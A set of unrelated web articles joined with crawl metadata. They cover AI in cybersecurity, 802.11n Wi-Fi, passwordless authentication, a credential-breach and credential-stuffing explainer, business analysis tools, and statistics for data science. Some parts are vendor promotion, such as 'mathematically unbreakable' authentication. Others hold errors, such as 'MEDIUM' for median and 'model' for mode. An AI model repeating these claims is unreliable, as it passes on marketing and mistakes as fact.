Moreover, systems that run on AI can unlock potential for natural language processing, which collects information automatically by gathering various articles, news reports, and studies on cyber threats. The collected information gives insight to cyber-attacks, glitches, and prevention techniques. In this way, the cybersecurity companies remain updated regarding the latest risks and timeframe as well as build responsive strategies to keep the organization protected, which is quite challenging for humans to do so alone.
It is also found that 61% of organizations can detect breach attempts only with the use of AI technologies. Hence, it proves that AI is overtaking humans both in the fields of cybersecurity and data protection.
How is AI helping in cybersecurity?
Well! To a great extent, AI systems are outperforming humans, but there are certain limitations and drawbacks, too, which will be discussed later in this article.
AI is naturally skilled at utilizing massive data for analysis and is possibly the only suitable way to process big data in a given period. AI is capable of performing tasks without any supervision, which significantly improves analysis efficiency. These characteristics of AI enable it to take over humans.
AI is also capable of surveilling, identifying, monitoring, and tracking individuals across various devices, either they are at home, work, or even at any public location. It means that if your personal and private data is anonymized after it becomes a part of a large data set, an AI system can easily de-anonymize the date based on the interferences from other devices. The system blurs the differences between both personal and non-personal data and ensures protection from cybercriminals.
Furthermore, many cybersecurity firms are training AI systems to identify malware and viruses with the help of sophisticated algorithms, so AI can run various patterns of recognition in software. The AI systems also help in detecting the smallest behavior of ransomware attacks before it enters the system and later isolates them from that system. It shows that how AI systems are overtaking humans and helping in data protection of various firms too.
For personal protection and privacy, AI is again outperforming humans but in a negative sense by increasing the privacy risks to individuals. The AI-driven consumer products and autonomous systems are continuously equipped with sensors which collect and generate a massive amount of data without the knowledge of their users.
AI methods are used to recognize people who want to remain anonymous. They generate sensitive information about people from non-personal data with a mission to profile people based on their population-scale data, some of which influence an individual’s lives.
Limitations of using AI
The benefits discussed above are just a fraction of the potential of how AI is helpful in the cybersecurity world and how it is outperforming human beings. However, there are some limitations, too, which are preventing AI from becoming a mainstream tool to be used in this field.
To build and maintain AI systems, organizations might need a massive amount of resources, which includes data, computing power, and memory.
Secondly, it is also a fact that hackers can also use AI to test their malware and enhance it to become AI-proof. AI-proof malware can be exceptionally destructive as they are capable of learning from the existing AI tools and create more advanced attacks that can penetrate AI-boosted systems.
Mentioned below are some strategies which every firm should adopt to overcome the AI limitations.
Hire cybersecurity professionals who have prior experience and skills in different areas of cybersecurity.
Employ a cybersecurity team for testing systems and networks for any possible gaps and fix them as soon as possible.
Install firewalls as well as other malware scanners to protect your systems and keep them updated to match the redesigned malware.
Monitor the outgoing traffic and do apply exit filters to restrict the type of traffic.
Use filters for URLs to block any malicious links which can have malware or a virus.
Digital technologies like AI have made significant contributions to many areas of our life. The enormous quantities of information which we can collect and analyze are all blessings of AI. But there are areas where AI is restricted, so humans are the only possible solutions. Therefore, it is evident to say that AI has outperformed humans not entirely but to a great extent. | <urn:uuid:748503ed-bd18-4ad3-90cc-93b784a9935f> | CC-MAIN-2022-40 | https://www.cpomagazine.com/cyber-security/are-ai-systems-outperforming-humans/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00740.warc.gz | en | 0.957828 | 1,337 | 2.9375 | 3 |
Five Things You Need To Know About 802.11n
Five facts to help you navigate through the new standard.
By Joe Epstein
People often say that wireless networking will someday replace the hard wires that connect people to the network, but for years the technology supporting wireless LANs wasn’t considered sufficiently powerful. Instead, WLANs were perceived as a good supplement to wires, providing mobility and convenience for employees, but with the understanding that users would plug back in to Ethernet as their primary connection. WLANs were simply too slow, too hard to deploy, and too sensitive to the number of users to really be relied on.
With the recently ratified wireless networking standard, dubbed 802.11n, there are new opportunities to change that belief. The latest generation of wireless technology that underlies Wi-Fi was ratified in September, opening up opportunities for wireless networking. Networks based on this new technology can run as much as seven times faster than the previous generation of wireless could -- to over 200Mbps. Along with this greater speed come features that make wireless an attractive option.
If you are building out a new network, or have an existing one, and want to understand what 802.11n means to your environment and users, the five points below highlight the basic, key points that will help you navigate through this new standard.
1. 802.11n can outperform many existing wired networks
802.11n uses a number of new techniques to wireless networking to reach bit rates of 300Mbps -- translating to over 200Mbps of real TCP data after taking overhead into account. Many wireline data networks to the desk are only based on “Fast Ethernet,” or 100BASE-T, providing less than 100Mbps of real data throughput. That gives wireless networks the potential to go twice as fast as wired networks, for the first time ever. Future versions of 802.11n will go even faster, and soon we may see up to 600Mbps for peak bit rates.
Of course, the clients have to share the throughput of one 802.11n access point Some 802.11n network vendors allow the layering of channels in one area, allowing a peak throughput of over ten times in one square foot, exceeding a gigabit of aggregate throughput to split across the users -- more than enough for most networks in the foreseeable future.
2. 802.11n can run your wireline applications at a lower cost
With the higher throughput, it is now possible to move conventional, wired-only applications onto wireless. Medical applications, financial applications, warehouse inventory and shop floor management software, point-of-sale systems, and applications that were too business-critical for legacy, low-throughput WLANs are now being deployed on top of 802.11n.
The idea of a school doing all of its teaching and testing online may not be new, but to have all students connected online in the classroom is, and 802.11n makes it possible.
New applications are also being created just for wireless to take advantage of the blend of capacity and mobility that 802.11n provides. Hospitals are migrating chart and prescription applications to wireless and have started deploying “robo-docs” -- robots with a camera and a screen that can do rounds and visit patients with the actual doctor seated a thousand miles away.
There will still be wired ports for some time to come, but their role will change as wireless begins to share the title of primary network. The fact that wireless networks are less expensive to install -- far fewer cable pulls and ports -- is making sure of that.
3. 802.11n is not like its predecessors, 802.11a/b/g
Compared to previous 802.11a/b/g wireless networks, 802.11n marks a radical departure. It is faster and gets its higher speed in a unique way. This means that there is a learning curve that administrators of wireless networks must go through to understand what 802.11n can do and how it works.
The added speed is possible by using radio waves in a different way. Instead of relying on a straight path from the access point to the client (passing through walls as needed), 802.11n relies on signals that echo off of every surface. This concept, called multipath, means that 802.11n uses a different set of rules to predict when it will perform optimally and when it will have to back down to lower throughputs. For example, tough-to-cover spots in legacy networks can become some of the best spots for performance with 802.11n.
Multipath directly impacts the tools used to plan for, deploy, and manage a WLAN. New tools, based themselves on new techniques, have to be created. Prediction tools, such as RF planning systems and networks that use automatic RF configuration, are the hardest hit, because how well 802.11n will operate cannot be predicted; performance depends on how signals bounce off surfaces. New tools and systems are emerging that can solve the problem a different way, providing predictability by replacing old methods (such as dynamic transmit power control and dynamic channel selection) with robust methods specifically for 802.11n.
4. Device diversity is much higher in wireless than wires, however, so keep your eyes open
The actual technology used in 802.11n is more advanced than that in Ethernet. The greater power each client has provides a greater set of options and places for behaviors to differ. Therefore, the diversity in client capabilities is much greater in wireless than it was for wired connections. Most Ethernet ports can be thought of as essentially the same -- the only important question is whether it is 10Mbps, 100Mbps, or gigabit -- but 802.11n devices support a far greater number of features and can do so quite differently.
The good news is that nearly every client is certified to be interoperable by the Wi-Fi Alliance, an industry organization dedicated to this cause. In fact, they have been certifying for over two years now, first based on an earlier version of the technology but now using the ratified standard. This has ensured that all of the 802.11n devices work together.
Optimal performance still depends on the feature set of each device and how the devices makes use of these features, which, in turn, depends on the particular model of wireless adapter and driver version. For example, in the two years that 802.11n-compatable devices have been commercially available, Intel has sold three different types of Centrino 802.11n adapters: the 4965, the 5100, and the 5300. Each one supports a different peak data rate and a similar, but still substantially differing, set of features. The same holds for other manufacturers.
There is a solution to this, embodied in the last thing you need to know about 802.11n.
5. It is now possible to build a switch-like network with 802.11n
Previously, wireless LANs were a free-for-all, where every device could do what it wanted -- within boundaries -- with the network unable to prevent such activity because legacy wireless was purely hub-based. Wireline Ethernet solved its own free-for-all problem, launching edge networking into the mainstream with the creation of a switch. Techniques have been added to 802.11n that now make it possible to build a switch-like wireless network.
Each wireless device can be segregated into its own wireless “port,” where its ability to affect the quality of the network for all of the other devices is nearly eliminated. Switch-like wireless allows the same methods of bringing the network under control for Ethernet to be used with 802.11n.
Currently, most wireless vendors still sell hub-based 802.11n, but switch-like 802.11n is now available, and it is important for those building wireless networks to seek out switch-like technology, and not just build a faster hub-based network.
The Last Word
Together, switch-like 802.11n, with its higher throughput, application-enabling mobility, and powerful client devices, can finally create a network that can replace Ethernet at the desks and in the halls.
Joe Epstein is the senior director of technology at Meru Networks. You can contact the author at email@example.com | <urn:uuid:3ad0cf1d-10ec-4e54-bb12-7e9ef8cc8428> | CC-MAIN-2022-40 | https://esj.com/articles/2010/01/19/five-things-80211.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00740.warc.gz | en | 0.94886 | 1,710 | 2.53125 | 3 |
Providing secure and easy-to-use authentication and login mechanisms should be one of the main goals every online service pursues.
Unfortunately, passwords, the traditional method to protect online accounts and keep intruders out, are becoming less reliable and more cumbersome to maintain, both for users as well as service providers. The industry has become in desperate need for a no-password option.
Where to go from here?
Fortunately, alternative, no-password login technologies exist that provide password-less identity verification, and can help solve some of the perennial problems that stem from the use of passwords.
Why are passwords insecure?
There are many reasons to assume that a decent password is no longer enough to protect a sensitive account. These days, a strong password is one that has a length of at least 10 characters and consists of letters, digits and symbols. Moreover, it should not be shared with any other service and should be changed every three months in the minimum.
It gets worse:
With users having dozens of email, messaging, social media, banking and other online accounts, memorizing and maintaining so many unique passwords becomes a burden. And every new account that a user creates adds to that burden.
That’s why users often neglect those requirements, choosing weak passwords, reusing passwords across accounts, avoiding changing password, which makes them vulnerable to brute-force attacks, dictionary attacks, cross-service password breaches, and more.
From a service provider perspective, passwords require a company to store secrets and burden them with the task of protecting those secrets.
Even the biggest companies have a hard time protecting password databases against data breaches.
Moreover, as users often forget their passwords, companies are required to store password hints and provide password recovery mechanisms, which opens up a Pandora’s box of vulnerabilities and attack vectors.
What are no-login password technologies?
The goal of no-login password is to provide security that is on par with or superior to complex passwords while at the same time is as simple to use as password authentication, or simpler.
Some promising alternatives:
Biometric authentication uses biological input to verify the identity of a user. The implementation of biometric authentication used to be a complicated and costly process, but has become more accessible thanks to advances in smartphone technology.
The most popular form of biometric authentication is fingerprint scanning, with other methods including retina scans and voice authentication.
One of the biggest hurdles to implementing biometric authentication is still the hardware requirements. Fingerprint scanners are only available on high-end, expensive devices that not all users can afford. This makes them less ideal for public applications that will be used by all kinds of users.
Also, there are many settings where biometric authentication can go wrong, which always makes it necessary to couple it with some other form of authentication.
One-time passwords (OTP)
One-time password is an authentication mechanism that uses a non-persistent secret, usually a short passcode that is valid for one session. Upon every login attempt, a pass-code is generated and sent to an associated phone number or email address, which the user has to enter in the login page order to access the account.
The passcode is only be valid for the duration of the one session. Any subsequent logins will require a new passcode.
OTPs have the benefit that they do not require the service provider to store permanent passwords on its servers, making them considerably safer than normal passwords.
However, an insecure implementation can open up its own set of vulnerabilities. For instance, sending OTPs through SMS is no longer considered secure due to the risk the channel through which the message is generated becoming compromised.
The complexity of the process in comparison to entering passwords is one of the factors that has resulted OTPs not being very popular among users and leading to their adoption as a secondary authentication mechanism rather than the main way to verify user identity.
Authenticator apps use a mobile application to verify user identity. When signing up with a service, users install the authenticator app on their mobile device and associate it with their account.
When users attempt to access their account, instead of prompting for a password, the service sends an access request to the associated device through the authenticator app. After the user approves the app request, access to the account is granted.
Authenticator apps are rising in popularity because of their added security, frictionless experience and the fact that mobile devices are becoming ubiquitous. Google and Microsoft provide authenticator apps for their own services as well as an extension that you can add to your own website.
The Double Octopus authentication solution provides the ease of use attributed to authenticator apps and uses the secret-sharing mechanism to eliminate the vulnerabilities that other solutions suffer from.
Find out more about Double Octopus authentication solution here. | <urn:uuid:c8e72fb9-0d1a-421b-9734-6d9a85d1b12d> | CC-MAIN-2022-40 | https://doubleoctopus.com/blog/passwordless-mfa/no-password-login-friction-less-secure-alternatives-passwords/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00740.warc.gz | en | 0.932986 | 990 | 2.765625 | 3 |
In today’s digital threat landscape, large-scale information compromise is no longer big news.
Averaging one a month, hackers have consistently managed to execute major breaches against organizations the world over, resulting in millions of compromised identities
But the sheer scale of the most recent mega breach makes it something unique.
Dubbed Collection #1 by its discoverer Troy Hunt, the breach amounts to nearly 773 million exposed usernames and passwords. The database was uploaded in a post to an unnamed dark web hacking forum. Hunt subsequently organized these files in a publicly viewable Pastebin file.
Hardly a Surprise
Needless to say, the industry was in awe over the size of this breach. The broader implications of Collection #1’s discovery is that there are likely scores of other databases like it, credential troves that are being bought, sold, and traded every day on hacking forums.
But this massive collection of stolen credentials being uncovered should hardly surprise anyone. Credentials have for long been the weak link in the security chain. For years, the overwhelming majority of hacks have been the result of stolen passwords. As long as identity security is dependent on a piece of information users need to safeguard, cybercriminals will find a way to obtain it.
Then of course there’s the human factor. Either by inadvertently exposing their passwords, or entering them via an insecure medium, users regularly put their credentials at risk. An organization that entrusts users to control their authentication details is inviting hackers.
An Accumulating Threat
When most businesses hears news of a breach, their first response is to assume that it affects the broader consumer market, not the organization.
Companies need to step out of this mindset of immunity.
Using a three-step process, hackers can use large compilations of credentials to maximize the amount of illicit access they can achieve, and wreak havoc on businesses.
Step 1) Credential Stuffing
Once cybercriminals have amassed a good amount of spilled usernames and passwords, they use a program called an account checker to test the stolen credentials against a multitude of websites, usually high value sites such as social media platforms or online marketplaces. Statistically, 0.1 to 0.2 percent of total logins in a well run stuffing campaign are successful. That may sound like a miniscule amount, but when running hundreds of thousands of credential sets against dozens or even hundreds of sites, those successes add up and when dealing with a breach of over 700M those numbers are in the hundreds of thousands.
Step 2) Corporate Account Takeover
Corporate Account Takeover is a type of business identity theft where cyber thieves gain control of key company accounts assuming its identity and privileges. These are typically accounts of senior officials, that grant them special privileges to manipulate company data and/or assets. Once hackers successfully gain access to such an account through a stuffing campaign, they can then assume the privileged identity in order to move through the organization unabated.
Step 3: Privilege Escalation
Once attackers have gained access to a corporate account, they then look for a vulnerability, design flaw or configuration oversight to gain elevated access to protected resources from the user level up to the Kernel level. Then allows them to manipulate or steal data, and even make monetary transactions on the company bill.
The revelation of Collection #1 is just the latest reminder on a hard truth of digital authentication: as long as there is a human factor, identities will be at risk.
The single most effective step to secure accounts and protect networks is to circumvent all the vulnerabilities associated with password-based authentication. Adopting a passwordless multi factor authentication (MFA) solution means no more risk of credentials being compromised by accidental exposure, and no more password theft via traditional methods such as phishing schemes.
But going passwordless offers more than security advantages. User experience for all account holders is increased exponentially, as users are no longer required to remember passwords, abide by complex password policies, or run the risk of being locked out when a password is lost or discarded.
The Octopus Approach
The Octopus Authenticator of Secret Double Octopus is the only passwordless solution offering seamless, mathematically unbreakable authentication.
Octopus Authenticator is fully scalable to any organization and can be integrated into all enterprise cases and tools. This means no service within the network is left to rely on user-controlled passwords.
To address the needs of today’s mobile and off-site workforce, the Authenticator allows for both offline and online access.
Octopus provides the very highest in authentication assurance while removing password related costs and the pains of memorized secrets. | <urn:uuid:a0af7f02-ba3f-4223-bcb9-a2ed8bd063bb> | CC-MAIN-2022-40 | https://doubleoctopus.com/blog/threats-and-attacks/big-credential-breaches/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00740.warc.gz | en | 0.926133 | 962 | 2.640625 | 3 |
Business analysis is the procedure of learning about business requirements. Business Analyics tools benefit business analysts better team up, gather and sort information, report business necessities, use case examination, and model creation.
Do you know any of the tools of business analysis? If not, then just go through the blog to know about top business analysis tools used by the business analyst.
Through this blog, we will try to make you aware of the Definition of business analysis, its importance, the difference between business analysis and business analytics, top business analysis tools, techniques of business analysis, differences between business analysis and business intelligence.
What is Business Analysis?
Business analysis is about understanding how your company works to serve its goals. It can be perceived as an examination discipline that encourages you to discover the business needs and distinguish answers for business issues.
These answers may incorporate the advancement of a product or framework part, upgrades in the cycle, authoritative changes, or vital planning and strategy improvement. Thus, the reason for business analysis is to understand explanations that address the issue of advancement.
Business Analysis offers ideas and experiences into the advancement of the underlying structure for any undertaking. It stores the way to direct partners of a venture who performs business demonstrating in a precise way. There are a lot of ways to describe the process and techniques of a Business Analysis. However, there is one common definition.
A particular group of information, work, and procedures, which are necessary to know about the requirements of business and the solutions to its problems is called Business Analysis.
The process and techniques can be different in various industries. When talking about Business Analysis in an IT industry, it usually involves a system development component. Additionally, the changes in organization and betterment in processes are also taken into consideration.
(Related blog: What is a Business Analyst?)
Business Analysis can even tell about the current state of any organization. Also, needs and requirements can be identified. However, business analysis is usually performed to find solutions to the goals and objectives of the business.
Importance of Business Analysis
Business analysis is very important for any company for attaining economic stability in the market. The company strengthens its tactical and technological abilities by analyzing business. The reason behind this is to become familiar with the market strategy and even their stance in the market.
Hence, we can say that business analysis is a very powerful part of any business. It works for observing business, it’s desired, and infers the best remedy to the company problems. Also, it helps to enhance the cogency of IT through adequate alignment with the company to improve profitability.
Difference Between Business Analytics and Business Analysis
In the world of business, we often hear the word business analysis and business analytics, but have you ever thought about how they are different? If not, then keep reading to know the differences between business analysis and business analytics;
The architectural domains for business analysis are process architecture, enterprise architecture, and technology architecture whereas architectural domains for business analytics are data architecture, and information architecture.
What is the Difference between Business Analysis and Business Intelligence?
Have you ever thought about how business analysis and business intelligence are different? So, here you will find the answer to this question.
Business analysis has more expressive indicators than business intelligence. Since business intelligence depends on an assortment of information, it is typically centred around achieving a quick beneficial turn of events, while business analysis is a steady cycle.
Business analysts are continually investigating information procured by business intelligence units to sort out the most ideal alternatives for better activities in the future. Business Intelligence has some limitations whereas business analysis does not have that many limitations.
(Most related: Top Business Intelligence Tools and Techniques)
There are other differences also like business analysis is more crucial to decision making that business intelligence, business intelligence can run the business but business analysis changes the business.
Top 11 Business Analysis Tools
As today everything is incorporated with technology, no doubt a basic and proficient business analysis tool helps in playing out the business analysis errands all the more rapidly and effectively. Here, you will learn about some of the best business analysis tools.
Oracle NetSuite is one bound together business management suite. It includes functionalities for ERP, CRM, and so forth.
- SuiteAnalytics gives the tools of saved search that will channel and match information for responding to various business questions. It has answers for little to enormous size organizations.
- It gives standard and adjustable reports to all transaction types. It will let you make a Workbook without coding and encourages you with analyzing the information.
- Oracle NetSuite has functionalities to assist entire industries with their complicated practical, enterprise, and tax requirements.
Creatio is a low code stage with CRM and cycles automation functionalities.
- This low code stage will let IT just as non-IT individuals fabricate the applications as indicated by their particular business needs.
- It benefits on-premise just as in cloud deployment.
- This BPM device is best for medium to enormous organizations.
Do you know you can personalize the transmission with the customer through Service Creatio? If not then let’s make it clear, yes you can. Also, it has out-of-the-box explanations that will broaden outlet functionality.
Wrike is the real-time Work Management tool for the business analysis process that centrally deposits entire information for making the cost of overall project less.
- It gives the building block of the working ecosystem and a visual timeline to examine the project schedule and project reporting.
- By rendering the workload view feature, Wrike can be used for balancing resources and performance tracking. For example, it keeps records of the time consumed by any team member for planning and budget management.
- As a cloud-based project management software, it is a mobile-responsive platform that can be implemented to update any task form any anywhere, and for live editing and file management.
- It can help in setting and planning deadlines for project execution. Additionally, it gives a calendar function with the facility to communicate and confirm within the software.
Xplenty is a cloud-based information mix stage that will bring all your information sources together.
- It offers no-code and low-code alternatives that will make the stage to be usable by anybody.
- Its instinctive realistic interface will assist you with executing an ETL, ELT, or a replication arrangement.
- Xplenty offers answers for promoting, deals, client care, and engineers.
Xplenty's sales analytics explanation gives the characteristics to comprehend your clients, information enhancement, brought together information base, for keeping your CRM coordinated, and so forth.
Bizagi is the agile automation platform that offers three products to use on-premise, i.e Bizagi Modeler, Studio, and Automation. For instance, Bizagi Modeler is used for drawing diagrams that follow BPMN.
In order to draw business process models, it is essentially simple to use and most powerful, also it can generate enormous documentation in MS Word.
In the cloud, it provides as a service platform. Moreover, Bizagi offers business management tools and supports Word, PDF, Wiki and Share Point.
Top business analysis tools
HubSpot is inbound marketing, sales, and service software that is used to examine the performance of a site with essence metrics so that a user can learn about the quality and quantity of traffic generated.
Its Marketing Analytics Software can assist in computing the efficiency/conduct of overall advertising efforts at a single spot. Also, it has an in-built analysis feature and gives reports and dashboards.
In addition to that, for instance, the user can filter the analytics, say by country or any particular URL structure, even each of user marketing platform, the user would obtain reports in detail.
Microsoft Visio, a portion of the MS office, is the dominant tool for project management and business modelling. It can effectively be deployed to catch and present the idea of stakeholders in the particulars of business functions and user interactions.
In order to make advance diagrams and templates, it can be used to link data from several sources for representing information graphically.
Moreover, Microsoft Visio can be used to produce project flowcharts, use-case diagrams, process flowcharts, data models, architecture designs and diagrams, project schedules and sequence diagrams and activities, etc.
Lucidchart is a visual communication tool that is available online. It is a type of web-based explanation for charts and graphs. It can be used simply by taking its subscription.
With this tool, you can sketch simple as well as complicated flowcharts and diagrams, even more, you can forge a suitable connection among live data and diagrams.
For designing and making automated build org charts, Lucidcharts supports data importing, its cloud-based platform and intuitive user-interface make it easier to begin diagramming, even if you are using any device, browser or operating system.
Moreover, Lucidchart enhances the ecosystem of teamwork by providing co-authoring in real-time, in-editor chat, shape-specific comments, and collaborative cursors.
It can be blended with any most-used app such as G Suite, Atlassian, Microsoft Office, or Slack to start new diagrams or incorporate existing visuals where users communication already was taking place.
Blueprint is the tool that is mainly designed for agile planning, simply, it would scale organizational swiftness. More specifically, it can make customized lean documentation from artefacts, and aid in delivering products more quickly, and Blueprint can be integrated with JIRA.
Robotic process automation that is designed using manual documentation is likely to smash and demand maintenance, in cure if it, Blueprint provides a solution in the form of the Enterprise Automation Suite, a powerful process automation design platform, it has all the facilitated components to design and deliver excellent quality RPA implementations.
The Enterprise Automation Suite, from Blueprint, can give digital Blueprints that allow us to define, design, and delivering the right solutions, such solutions can make influential business values to our business.
InVision is a prototyping business tool that enables us to create interactive mock-ups swiftly and easily for our designs. Whenever designs are ready, they could be shared in the team, besides that, one can discuss mock-ups by leaving comments inside the app.
Through this tool, a user can make designs for his/her products and this can be used with a number of platforms like DropBox, Slack, Microsoft teams, BaseCamp, Confluence, Teamwork, and Trello.
InVision has the feature as;
InVision Cloud, for making designs for products,
InVision Studio, for designing the screen, and
InVision DSM (Design System Manager), changes in the design get sync, and a user can access the library from InVision Studio.
Many business projects appeal wireframing applications for representing the proposed project’s model (mock-ups) usually wireframing diverges on content, and user interaction.
This tool deploys brainstorming sessions and gives instant feedback from stakeholders. Moreover, Balsamiq models assist businesses to work faster and smoothly, enable to introduce projects online and work as collaboration support amid team and clients.
For example, if you want to create wireframes for your websites then you can use this tool as it gives a GUI for mock-up, gives an editor, and drag and drop facility.
Balsamiq gives ample user interface controls and icons and provides an abundant library for customized controls and build reusable constituent libraries and templates.
It depicts project models using pdf with inserted links and renders the swift and spontaneous user interface.
What are the Techniques of Business Analysis?
Here we will learn about the most important business analysis techniques.
SWOT- SWOT is the short form of Strength, Weakness, Opportunities, Threats. This will help you in finding areas of both strength and weakness. Also, it permits a reasonable allotment of resources.
(Also read: The SWOT analysis of Reliance Jio)
MOST- Mission, Objectives, Strategies is the full form of Most. It permits business analysts to perform through inside investigation of what is the point of an association to accomplish and how to handle such issues.
(Read our blog on MOST analysis)
PESTLE- Political, Economic, Sociological, Technological, Legal, and Environmental is the full form of PESTLE. This prototype assists business analysts to assess all the outside variables which can impress their association and decide how to deal with them.
Business analysis methods assist you to know the pattern and the dynamics of the corporation and also permits you to solve recent issues in the target association. So, after reading the blog you must have realized the importance and tools of business analysis.
There are plenty of tools for business analysis that help business analysts in doing their work easily, so a business analyst can't learn or use all such tools within the period of their work life.
"Business analysts must have a thick skin: thick enough to take feedback on documents and receive unexpected answers to questions!"- Laura Brandenburg
Business Analysis tools can be used for displaying by the analyst from arranging through to product support. The analysis tools can be used with any business analysis measure with a wide scope of highlights that permit experts to work using their preferred strategies.
The analyst will be cheerful in the knowledge that whatever the assignment is, there will consistently be an analysis tool to help them. | <urn:uuid:68e7b007-8866-4d0a-9776-1d54986f9cd7> | CC-MAIN-2022-40 | https://www.analyticssteps.com/blogs/11-top-business-analysis-tools | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00740.warc.gz | en | 0.921283 | 2,860 | 2.609375 | 3 |
In 8th class, Statistics used to be one of the easiest chapters of all in the mathematics section and that was actually the real purpose of it to combine different types of data and to present it in an adequate and neat way.
Nobody at that age and IQ level would understand the use of it but now in today’s world, it has become the norm to process data through statistics so that it becomes trouble-free for others to understand it and pick something valuable and informative out of it.
To put it in simple words, statistics is the basic use of mathematics in formulating a technical analysis of data. It is used to process complex problems in the real world so that data scientists and analysts can look for meaningful trends and changes in Data.
Different statistical techniques and functions, principles and algorithms work together to provide us with an ideal Statistical model.
If the data taken is a sample from a larger population, then the data scientist or the analyst is supposed to assume patterns and interpret them as data from the large population solely based on the results of the sample size that was taken earlier. This may seem like a scary yet bold step but you would be surprised by its accuracy.
Statistical analysis has proven to be an elite way to analyse and interpret data in various different fields such as the psychology, business, physical and social sciences, production and manufacturing, government, etc.
On the other side, Data Science is the perfect blend of business, mathematics, computer science and communication.
As Wikipedia search for Data Science reads, ”Data Science is a concept to unify statistics, data analysis, and their related methods in order to understand and analyse the actual phenomena with data.” It is using different algorithms, patterns from structured or unstructured data to form insights and gain knowledge about any field of play.
It is primarily used to make decisions and predictions making use of predictive casual analytics, prescriptive analytics (predictive plus decision science) and machine learning. However, all these analyses are described in another blog, i.e. types of statistical analysis.
Data Science is just like any other science requiring firstly to define a problem. Then collect and leverage data to counteract with solutions and test the solution if it's applicable on the given problem.
Importance of Statistics in Data Science
As we know that Data Science is the study of data in different forms to make healthy assumptions about behaviours and tendencies and to make these assumptions the information needs to be organised according to the concepts of statistics so that the study becomes easy and hence the findings become more accurate.
When the data is big and unorganised, statistics plays a powerful role in that situation. When a company uses statistics to find insights, it makes the tedious task look minimalist and easy in front of the big and buffer information that was provided earlier.
Statistics eradicate the unwanted information and catalogues the useful data in an effortless way making the humongous task of organising inputs seem so futile and serene.
Some ways in which Statistics helps in Data Science are:
Prediction and Classification: Statistics help in prediction and classification of data whether it would be right for the clients viewing by their previous usage of data.
Helps to create Probability Distribution and Estimation: Probability Distribution and Estimation are crucial in understanding the basics of machine learning and algorithms like logistic regressions.
Cross-validation and LOOCV techniques are also inherently statistical tools that have been brought into the Machine Learning and Data Analytics world for inference-based research, A/B and hypothesis testing.
Pattern Detection and Grouping: Statistics help in picking out the optimal data and weeding out the unnecessary dump of data for companies who like their work organised. It also helps spot out anomalies which further helps in processing the right data.
Powerful Insights: Dashboards, charts, reports and other data visualizations types in the form of interactive and effective representations give much more powerful insights than plain data and it also makes the data more readable and interesting.
Segmentation and Optimization: It also segments the data according to different kinds of demographic or psychographic factors that affect its processing. It also optimizes data in accordance with minimizing risk and maximizing outputs.
Apart from that, some of the statistical methods are also imperative approaches while analyzing complex data, some are discussed below.
Descriptive and Inferential Statistics for Data Analysis
There are 2 main categories in the statistics department-
Descriptive Statistics churns the data to provide a description of the population by relying on the characteristics of data providing parameters.
For eg- In a class, if we need to find average marks of a student in a test, in the descriptive analysis we would note the marks of every student in the class and then would note the highest marks obtained by a student, the lowest marks and the average of the class.
(Related read: Descriptive Statistics in R)
Types of statistics: Descriptive and inferential
Inferential Statistics makes predictions and assumptions regarding a large population by the trends prevalent in a sample taken from the same.
For eg. - In the recent past, many clinical trials have been done for the CoronaVirus vaccine and for the people are being chosen at random as a sample size from the immense population of different geographical locations.
Decoding the Descriptive Analysis
Whenever Descriptive Analysis is practised, it is always done around a central measurement which actually plays a huge role in determining the results. These central parameters are the Mean, Median and Mode.
Let’s throw some light on these measurements:
Measures of the Center
MEAN- Measure of an average of all the values in a sample is called Mean.
Eg.- If we need to find the mean of the marks obtained by the students of a class we will take the sum of all the marks and divide it by the total number of students.
MEDIUM- Measure of the central value of the sample set is called Median.
Eg.- if we need to find the medium of the marks obtained by the students of a class we will arrange them in ascending or descending order of marks and the value in the exact middle of the size taken will be considered its medium.
MODE- The value most recurrent in the sample set is known as Mode.
Eg.- if we need to find the model of the marks obtained by the students of a class we will see the most recurring marks that most of the students have received, and that will become the model of the class marks obtained.
Decoding the Inferential Statistics
Inferential Statistics is more prevalent in studying human nature and understanding the characteristics of the living. To analyse the trends of a general population, we take a random sample and study the properties of it. Then we test the findings, whether they comply with the general population accurately or not and then finally provide results with conclusive evidence.
Statisticians use hypothesis testing to formally check whether the hypothesis is accepted or rejected. Hypothesis testing is an Inferential Statistical technique used to determine whether the evidence stands tall in a data sample to infer that a certain condition complies with the entire population.
Statistical Data Analysis
Finding structures and making assumptions on it is the most predominant step of Statistical Data Analysis. Some useful Statistical Data Analysis Methods are:
As discussed above, Hypothesis Testing is one of the most important methods of analysis. Also, hypotheses are the natural links between underlying theory and statistics. Recurring usage of specific data in different tests allows the hypothesis to be more accurate.
(Most related: What is p-value in statistics?)
Classification is the most common method to define sub-populations from data. Now in the age of Big Data, it has become a necessity to look upon traditional methods such as Classification because the number of observations or the number of features tends to increase which makes the calculations too difficult.
Regression methods are the main tool to find global and local relationships between features when the target variable is measured. Simple Linear Regression is the most commonly used method for working within exponents. For more big data functional regression and quantile regression are used.
Time Series Analysis
Time series analysis is used to comprehend data and predict time intervals or temporal structure. Time series are very common in studies of observational data, and prediction is the most important challenge for such data. Its expertise is most commonly used in sectors of engineering, behavioural sciences, economics and natural sciences.
Nowadays it has become very hectic to even waste a minute on something not worth it and our lifestyles also reflect so. Everybody loves if their task is cut to the chase and is made viewer-friendly.
Statistics have been up to the task since it was discovered and now the people have actually understood how wonderful it is. It has made the life of many sectors easy and Data Science is one of these.
On the other side, data science is the rage of the new and without it, many supreme decisions could not have been possible. So, it would be safe to say we would not be where we are without Data Science and hence without Statistics. | <urn:uuid:db5ef35e-ad4d-49bd-8e08-9a2f0dd219b5> | CC-MAIN-2022-40 | https://www.analyticssteps.com/blogs/importance-statistics-data-science | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00740.warc.gz | en | 0.931184 | 1,900 | 3.203125 | 3 |
Creating Derived Views¶
This section describes how to create derived views based on the base views that retrieve data from different sources.
The following sections describe the process of creating the following types of views using our example to illustrate the process:
Union views: see section Creating Union Views
